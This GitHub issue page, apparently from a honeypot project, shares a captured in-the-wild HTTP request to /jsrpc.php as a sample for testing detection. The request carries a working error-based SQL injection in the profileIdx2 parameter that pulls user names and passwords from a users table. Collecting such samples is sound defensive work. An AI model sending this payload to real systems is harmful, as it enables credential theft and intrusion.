Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injections sample #143

Open
glaslos opened this issue May 24, 2017 · 2 comments
Open

SQL injections sample #143

glaslos opened this issue May 24, 2017 · 2 comments

Comments

@glaslos
Copy link
Member

glaslos commented May 24, 2017

INFO[0233] [http    ] POST /jsrpc.php HTTP/1.1
Host: 163.172.168.4
content-type: application/x-www-form-urlencoded
connection: keep-alive
accept-encoding: gzip, deflate
accept: */*
user-agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
content-length: 491


action=showlatest&filter=&filter_task=&groupid=&hostid=0&mark_color=1&method=screen.get&mode=2&pageFile=1&profileIdx=1&profileIdx2=%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C%28select+concat%28name%2C0x3a%2Cpasswd%29+from++users+limit+0%2C1%29%2C0x7e%29%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information_schema.tables+group+by+x%29a%29&resourcetype=16&screenid=&type=9&updateProfile=1
@rnehra01
Copy link
Collaborator

rnehra01 commented Jun 5, 2017

@glaslos please explain a bit.

@glaslos
Copy link
Member Author

glaslos commented Jun 6, 2017

Seen this SQL injection in the wild (profileIdx2= parameter`). Thought it might be useful for testing.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants